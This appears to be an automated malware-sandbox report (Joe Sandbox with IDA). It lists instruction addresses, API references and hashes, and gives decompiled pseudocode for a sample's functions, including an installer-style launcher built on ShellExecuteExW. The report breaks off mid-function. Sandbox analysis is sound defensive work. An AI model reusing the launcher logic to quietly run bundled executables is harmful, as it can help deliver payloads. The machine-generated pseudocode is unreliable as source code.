0x0006d637
0x0006d639
0x0006d63b
0x0006d63e
0x0006d644
0x0006d646
0x0006d649
0x0006d731
0x0006d73d
0x0006d745
0x0006d74d
0x0006d754
0x0006d757
0x0006d771
0x0006d77e
0x0006d786
0x0006d798
0x00000000
0x00000000
0x00000000
0x00000000
0x0006d759
0x0006d759
0x0006d75d
0x0006d766
0x0006d76b
0x0006d76c
0x0006d76c
0x00000000
0x0006d759
0x0006d64f
0x0006d656
0x0006d65d
0x0006d664
0x0006d664
0x0006d667
0x0006d669
0x0006d97c
0x0006d97c
0x0006d980
0x0006d981
0x0006d984
0x00000000
0x00000000
0x0006d98a
0x0006d98e
0x0006d9e0
0x0006d9e1
0x0006d9e4
0x0006da0a
0x0006da1a
0x0006da1f
0x0006da25
0x0006da27
0x0006da02
0x0006da02
0x00000000
0x0006da02
0x0006d9e8
0x0006d9e9
0x0006d9ec
0x00000000
0x00000000
0x0006d9ee
0x0006d9ee
0x0006d9f4
0x00000000
0x00000000
0x0006d9fd
0x0006da01
0x0006da01
0x00000000
0x0006da01
0x0006d990
0x0006d996
0x00000000
0x00000000
0x0006d9a0
0x0006d9a0
0x0006d9a3
0x0006d9ca
0x0006d9cc
0x0006d9cf
0x0006d9d0
0x0006d9d4
0x0006d9d5
0x0006d9d8
0x00000000
0x0006d9d8
0x0006d9a5
0x0006d9a5
0x0006d9a8
0x0006d9c6
0x00000000
0x0006d9c6
0x0006d9aa
0x0006d9aa
0x0006d9ad
0x0006d9c2
0x00000000
0x0006d9c2
0x0006d9af
0x0006d9af
0x0006d9b2
0x0006d9be
0x00000000
0x0006d9be
0x0006d9b5
0x0006d9b8
0x00000000
0x00000000
0x0006d9ba
0x00000000
0x0006d9ba
0x0006d66f
0x0006d674
0x0006d678
0x0006d684
0x0006d686
0x0006d687
0x0006d68b
0x0006d880
0x0006d883
0x0006d88a
0x0006d88f
0x0006d891
0x0006d976
0x0006d976
0x0006d979
0x00000000
0x0006d979
0x0006d8a3
0x0006d8b4
0x0006d8b9
0x0006d8be
0x0006d8c0
0x00000000
0x00000000
0x0006d8c8
0x0006d8db
0x0006d8f0
0x0006d905
0x0006d91a
0x0006d932
0x0006d937
0x0006d93a
0x0006d93c
0x0006d93e
0x0006d93e
0x0006d941
0x0006d947
0x0006d947
0x0006d95a
0x0006d95a
0x0006d95c
0x0006d95f
0x0006d960
0x0006d960
0x0006d964
0x0006d967
0x00000000
0x00000000
0x0006d969
0x0006d969
0x0006d96d
0x0006d71f
0x0006d71f
0x00000000
0x0006d71f
0x0006d973
0x0006d973
0x0006d960
0x0006d964
0x0006d967
0x00000000
0x00000000
0x00000000
0x0006d967
0x0006d960
0x0006d691
0x0006d694
0x0006d694
0x0006d697
0x0006d69a
0x0006d6a1
0x0006d6a8
0x0006d6af
0x0006d6b6
0x0006d6b9
0x0006d6ca
0x0006d6d1
0x0006d6d6
0x0006d6db
0x0006d6dc
0x0006d6de
0x0006d6f6
0x0006d6f6
0x00000000
0x0006d6f6
0x0006d6e3
0x0006d6e5
0x0006d6ea
0x00000000
0x00000000
0x0006d6ec
0x0006d6ee
0x0006d6ee
0x0006d6f1
0x0006d6f9
0x0006d6f9
0x0006d6fa
0x0006d6fa
0x0006d6ff
0x0006d702
0x0006d704
0x0006d706
0x0006d7be
0x0006d7c1
0x00000000
0x00000000
0x00000000
0x00000000
0x0006d7c7
0x0006d7c7
0x0006d7c7
0x0006d7cb
0x0006d7ce
0x00000000
0x00000000
0x0006d7d0
0x0006d7d0
0x0006d7d4
0x0006d7d9
0x0006d7dc
0x0006d7e1
0x0006d7e2
0x0006d7e4
0x0006d7e7
0x0006d808
0x0006d80a
0x0006d822
0x0006d827
0x0006d82a
0x0006d82d
0x0006d830
0x0006d853
0x0006d856
0x0006d85b
0x0006d85d
0x0006d85d
0x0006d873
0x0006d878
0x0006d832
0x0006d83e
0x0006d846
0x0006d84b
0x0006d84b
0x00000000
0x00000000
0x00000000
0x00000000
0x0006d7e9
0x0006d7e9
0x0006d7e9
0x0006d7ec
0x00000000
0x00000000
0x0006d7ee
0x0006d7f1
0x0006d7f4
0x0006d7fc
0x0006d7ff
0x0006d800
0x0006d803
0x00000000
0x00000000
0x00000000
0x0006d803
0x0006d805
0x00000000
0x0006d805
0x0006d7d6
0x0006d7d6
0x0006d7c7
0x0006d7c7
0x0006d7cb
0x0006d7ce
0x00000000
0x00000000
0x00000000
0x0006d7ce
0x0006d7c7
0x0006d71a
0x00000000
0x0006d71a
0x0006d67a
0x0006d67a
0x0006d67e
0x00000000
0x00000000
0x00000000
0x0006d722
0x0006d722
0x0006d722
0x0006d72b
0x0006d72e
0x00000000
0x0006d627
0x0006d628
0x00000000
0x0006d62d
0x0006d625
0x0006d5b2
0x0006d5b4
0x00000000
0x00000000
0x00000000
0x00000000
0x0006d3ed
0x0006d3ed
0x0006d3f0
0x0006d3f9
0x0006d3fe
0x0006d3ff
0x0006d3ff
0x0006d407
0x00000000
0x0006d407

APIs

__EH_prolog.LIBCMT ref: 0006D346
_wcschr.LIBVCRUNTIME ref: 0006D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0006D328,?), ref: 0006D382
__fprintf_l.LIBCMT ref: 0006D873

Part of subcall function 0007137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0006B652,00000000,?,?,?,00070354), ref: 00071396

Strings

RTL, xrefs: 0006D838
@%s:, xrefs: 0006D85D, 0006D869
,, xrefs: 0006D8AE
*messages***, xrefs: 0006D49A
*messages***, xrefs: 0006D4D3
$%s:, xrefs: 0006D856
a, xrefs: 0006D4EF
, xrefs: 0006D67A
$9, xrefs: 0006D6AF
R, xrefs: 0006D4E5

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$$9$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-3424091254
Opcode ID: 920b96e6e37923e11c15ad186da3398c393358a8571d0e45a107a9d2fef953a2
Instruction ID: 3fccc902a12e09830f94e117498cb614705c2eda7f5032e67a28a9ab7c942a17
Opcode Fuzzy Hash: 920b96e6e37923e11c15ad186da3398c393358a8571d0e45a107a9d2fef953a2
Instruction Fuzzy Hash: B412D2B1E002199ADF24EFA4DC85BEEB7B6FF04700F10416AF546A7182EB709E40CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0007CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0007CB5A() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E0007AC74(); // executed
				_t46 = GetDlgItem( *0xa8458, 0x68);
				_t49 =  *0xa8463; // 0x1
				if(_t49 == 0) {
					_t44 =  *0xa8440; // 0x0
					E000789EE(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0x935b4);
					 *0xa8463 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}

0x0007cb61
0x0007cb7b
0x0007cb80
0x0007cb86
0x0007cb88
0x0007cb8e
0x0007cb96
0x0007cba1
0x0007cbaf
0x0007cbb5
0x0007cbb5
0x0007cbc5
0x0007cbcf
0x0007cbdf
0x0007cbe7
0x0007cbeb
0x0007cbf0
0x0007cbf6
0x0007cc01
0x0007cc0b
0x0007cc13
0x0007cc13
0x0007cc23
0x0007cc31
0x0007cc40
0x0007cc48
0x0007cc56
0x0007cc67
0x0007cc67
0x0007cc83

APIs

Part of subcall function 0007AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0007AC85
Part of subcall function 0007AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0007AC96
Part of subcall function 0007AC74: IsDialogMessageW.USER32(00070354,?), ref: 0007ACAA
Part of subcall function 0007AC74: TranslateMessage.USER32(?), ref: 0007ACB8
Part of subcall function 0007AC74: DispatchMessageW.USER32(?), ref: 0007ACC2

GetDlgItem.USER32(00000068,000BECB0), ref: 0007CB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0007A632,00000001,?,?,0007AECB,00094F88,000BECB0), ref: 0007CB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0007CBA1
SendMessageW.USER32(00000000,000000C2,00000000,000935B4), ref: 0007CBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0007CBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0007CBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0007CC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0007CC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0007CC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0007CC67
SendMessageW.USER32(00000000,000000C2,00000000,0009431C), ref: 0007CC76

Strings

\, xrefs: 0007CBCF

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: d9dfc04c9d8fb16d8f6f7b922940f29c17061ccdf741f9d063d6744c247e070d
Instruction ID: b6bd76e4069511c34d0d2786b66e7334933989292c8110bc7a227c145ee01180
Opcode Fuzzy Hash: d9dfc04c9d8fb16d8f6f7b922940f29c17061ccdf741f9d063d6744c247e070d
Instruction Fuzzy Hash: 0231FF71184742AFF311DF20DC4AFAB7FACEB86744F104509F65096192EB684A08CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 0007CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E0007CE22(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t55;
				signed int _t58;
				signed short* _t59;
				long _t70;
				int _t79;
				intOrPtr _t82;
				signed int _t83;
				signed short* _t84;
				signed short _t85;
				long _t88;
				signed short* _t89;
				void* _t90;
				signed short* _t93;
				struct HWND__* _t95;
				void* _t96;
				void* _t97;
				void* _t100;

				_t96 = __ebp;
				_t55 = 0x1040;
				E0007E360();
				_t93 = _a4168;
				_t79 = 0;
				if( *_t93 == 0) {
					L55:
					return _t55;
				}
				_t55 = E000835B3(_t93);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t88 = 0x3c;
					E0007F350(_t88,  &_a4, 0, _t88);
					_t82 = _a4176;
					_t100 = _t100 + 0xc;
					_a4.cbSize = _t88;
					_a8 = 0x1c0;
					if(_t82 != 0) {
						_a8 = 0x5c0;
					}
					_t83 =  *_t93 & 0x0000ffff;
					_t89 =  &(_t93[1]);
					_push(_t96);
					_t97 = 0x22;
					if(_t83 != _t97) {
						_t89 = _t93;
					}
					_a20 = _t89;
					_t58 = _t79;
					if(_t83 == 0) {
						L13:
						_t59 = _a24;
						L14:
						if(_t59 == 0 ||  *_t59 == _t79) {
							if(_t82 == 0 &&  *0xab472 != _t79) {
								_a24 = 0xab472;
							}
						}
						_a32 = _a4172;
						_t90 = E0006B493(_t89);
						if(_t90 != 0 && E000717AC(_t90, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E0006A180(_a20) != 0) {
							E0006B239(_a20,  &_a64, 0x800);
							_a8 =  &_a52;
						}
						_t55 = ShellExecuteExW( &_a4); // executed
						if(_t55 != 0) {
							_t95 = _a4160;
							if( *0xa9468 != _t79 || _a4172 != _t79 ||  *0xbec99 != _t79) {
								if(_t95 != 0) {
									_push(_t95);
									if( *0xc20ac() != 0) {
										ShowWindow(_t95, _t79);
										_t79 = 1;
									}
								}
								 *0xc20a8(_a56, 0x7d0);
								E0007D2E6(_a48);
								if( *0xbec99 != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t70 = _v12;
									if(_t70 >  *0xbec9c) {
										 *0xbec9c = _t70;
									}
									 *0xbec9a = 1;
								}
							}
							CloseHandle(_a48);
							if(_t90 == 0 || E000717AC(_t90, L".exe") != 0) {
								_t55 = _a4164;
								if( *0xa9468 != 0 && _t55 == 0 &&  *0xbec99 == _t55) {
									 *0xbeca0 = 0x1b58;
								}
							} else {
								_t55 = _a4164;
							}
							if(_t79 != 0 && _t55 != 0) {
								_t55 = ShowWindow(_t95, 1);
							}
						}
						goto L55;
					}
					_t84 = _t93;
					_v0 = 0x20;
					do {
						if( *_t84 == _t97) {
							while(1) {
								_t58 = _t58 + 1;
								if(_t93[_t58] == _t79) {
									break;
								}
								if(_t93[_t58] == _t97) {
									_t85 = _v0;
									_t93[_t58] = _t85;
									L10:
									if(_t93[_t58] == _t85 ||  *((short*)(_t93 + 2 + _t58 * 2)) == 0x2f) {
										if(_t93[_t58] == _v0) {
											_t93[_t58] = 0;
										}
										_t59 =  &(_t93[_t58 + 1]);
										_a24 = _t59;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t85 = _v0;
						goto L10;
						L12:
						_t58 = _t58 + 1;
						_t84 =  &(_t93[_t58]);
					} while ( *_t84 != _t79);
					goto L13;
				}
			}

0x0007ce22
0x0007ce22
0x0007ce27
0x0007ce2e
0x0007ce35
0x0007ce3a
0x0007d08b
0x0007d093
0x0007d093
0x0007ce41
0x0007ce4c
0x00000000
0x0007ce52
0x0007ce55
0x0007ce5d
0x0007ce62
0x0007ce69
0x0007ce6c
0x0007ce70
0x0007ce7a
0x0007ce7c
0x0007ce7c
0x0007ce84
0x0007ce87
0x0007ce8a
0x0007ce8d
0x0007ce91
0x0007ce93
0x0007ce93
0x0007ce95
0x0007ce99
0x0007ce9e
0x0007ced6
0x0007ced6
0x0007ceda
0x0007cedd
0x0007cee6
0x0007cef1
0x0007cef1
0x0007cee6
0x0007cf01
0x0007cf0a
0x0007cf0e
0x0007cf1f
0x0007cf1f
0x0007cf32
0x0007cf42
0x0007cf4b
0x0007cf4b
0x0007cf54
0x0007cf5c
0x0007cf62
0x0007cf6f
0x0007cf84
0x0007cf86
0x0007cf8f
0x0007cf93
0x0007cf99
0x0007cf99
0x0007cf8f
0x0007cfa4
0x0007cfae
0x0007cfba
0x0007cfd9
0x0007cfe3
0x0007cfe5
0x0007cfe5
0x0007cfea
0x0007cfea
0x0007cfba
0x0007cff5
0x0007cffd
0x0007d015
0x0007d01c
0x0007d02a
0x0007d02a
0x0007d072
0x0007d072
0x0007d072
0x0007d07b
0x0007d084
0x0007d084
0x0007d07b
0x00000000
0x0007d08a
0x0007cea0
0x0007cea2
0x0007ceaa
0x0007cead
0x0007d03c
0x0007d03c
0x0007d041
0x00000000
0x00000000
0x0007d03a
0x0007d048
0x0007d04c
0x0007ceb7
0x0007cebb
0x0007d05d
0x0007d061
0x0007d061
0x0007d066
0x0007d069
0x00000000
0x00000000
0x00000000
0x00000000
0x0007cebb
0x0007d03a
0x0007d043
0x0007ceb3
0x00000000
0x0007cecd
0x0007cecd
0x0007cece
0x0007ced1
0x00000000
0x0007ceaa

APIs

ShellExecuteExW.SHELL32(?), ref: 0007CF54
ShowWindow.USER32(?,00000000), ref: 0007CF93
GetExitCodeProcess.KERNEL32 ref: 0007CFCF
CloseHandle.KERNEL32(?), ref: 0007CFF5
ShowWindow.USER32(?,00000001), ref: 0007D084

Part of subcall function 000717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0006BB05,00000000,.exe,?,?,00000800,?,?,000785DF,?), ref: 000717C2

Strings

.inf, xrefs: 0007CF10
, xrefs: 0007CEA2
.exe, xrefs: 0007CFFF

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: a06cd79f32beab86d14bd8963418a41a32fe0807f30803b76ad82898e0414460
Instruction ID: ccba0c530a8668d0a5a71569fcea5eaaea10713a4d760b97caecbbfc9249119b
Opcode Fuzzy Hash: a06cd79f32beab86d14bd8963418a41a32fe0807f30803b76ad82898e0414460
Instruction Fuzzy Hash: FB61E5709043809AFB719F24D804BAB7BF5AF85304F04C81EF5C997252D77D9986CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0008A058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E0008A058(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x9e668; // 0x136d1c5
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0008E6ED(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0007EC4A(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E0008A2C0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0008A72C(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E0008A2C0(_t101);
									goto L36;
								}
								_t62 = E0008A72C(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E0008A2C0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00088518(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00091A30();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0008A72C(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00088518(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00091A30();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x0008a05d
0x0008a05e
0x0008a05f
0x0008a066
0x0008a06a
0x0008a06b
0x0008a071
0x0008a077
0x0008a07d
0x0008a080
0x0008a080
0x0008a083
0x0008a085
0x0008a085
0x0008a083
0x0008a087
0x0008a08c
0x0008a093
0x0008a096
0x0008a096
0x0008a0b2
0x0008a0b8
0x0008a0bd
0x0008a250
0x0008a263
0x0008a0c3
0x0008a0c3
0x0008a0c6
0x0008a0cb
0x0008a0cf
0x0008a123
0x0008a123
0x0008a125
0x0008a127
0x0008a245
0x0008a245
0x0008a247
0x0008a248
0x00000000
0x0008a24e
0x0008a138
0x0008a13e
0x0008a140
0x00000000
0x00000000
0x0008a146
0x0008a158
0x0008a15d
0x0008a161
0x00000000
0x00000000
0x0008a16e
0x0008a1a8
0x0008a1ab
0x0008a1ae
0x0008a1b0
0x0008a1b2
0x0008a1b4
0x0008a200
0x0008a200
0x0008a202
0x0008a202
0x0008a204
0x0008a23e
0x0008a23f
0x00000000
0x0008a244
0x0008a218
0x0008a21d
0x0008a21f
0x00000000
0x00000000
0x0008a223
0x0008a224
0x0008a225
0x0008a228
0x0008a264
0x0008a267
0x0008a22a
0x0008a22a
0x0008a22b
0x0008a22b
0x0008a238
0x0008a23a
0x0008a23c
0x0008a26d
0x00000000
0x00000000
0x00000000
0x00000000
0x0008a23c
0x0008a1b6
0x0008a1b9
0x0008a1bb
0x0008a1bd
0x0008a1bf
0x0008a1c2
0x0008a1c7
0x0008a1e2
0x0008a1e4
0x0008a1ee
0x0008a1f0
0x0008a1f1
0x0008a1f3
0x00000000
0x00000000
0x0008a1f5
0x0008a1fb
0x0008a1fb
0x00000000
0x0008a1fb
0x0008a1c9
0x0008a1cb
0x0008a1cf
0x0008a1d4
0x0008a1d6
0x0008a1d8
0x00000000
0x00000000
0x0008a1da
0x00000000
0x0008a1da
0x0008a170
0x0008a175
0x00000000
0x00000000
0x0008a17b
0x0008a17d
0x00000000
0x00000000
0x0008a194
0x0008a199
0x0008a19d
0x00000000
0x00000000
0x00000000
0x0008a1a3
0x0008a0d6
0x0008a0d8
0x0008a0da
0x0008a0e2
0x0008a101
0x0008a103
0x0008a10d
0x0008a10f
0x0008a110
0x0008a112
0x00000000
0x00000000
0x0008a118
0x0008a11e
0x0008a11e
0x00000000
0x0008a11e
0x0008a0e6
0x0008a0ea
0x0008a0ef
0x0008a0f3
0x00000000
0x00000000
0x0008a0f9
0x00000000
0x0008a0f9

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00084E35,00084E35,?,?,?,0008A2A9,00000001,00000001,3FE85006), ref: 0008A0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0008A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0008A138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0008A232
__freea.LIBCMT ref: 0008A23F

Part of subcall function 00088518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0008C13D,00000000,?,000867E2,?,00000008,?,000889AD,?,?,?), ref: 0008854A

__freea.LIBCMT ref: 0008A248
__freea.LIBCMT ref: 0008A26D

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: bac1354b1421a4458fac0e8cd1bfd714b72963cbf4c2310029474efee312f9a8
Instruction ID: 98b0dc9bf28c4878768bc42e03b3f7d70ab6ff6243424b2ccb41634540997874
Opcode Fuzzy Hash: bac1354b1421a4458fac0e8cd1bfd714b72963cbf4c2310029474efee312f9a8
Instruction Fuzzy Hash: 1A51F272700206AEFB35AE68CC41FAF77A9FB46760F14422AFD84D6541EB35DC408762

Uniqueness

Uniqueness Score: -1.00%

Function 0007A2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0007A2C7(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
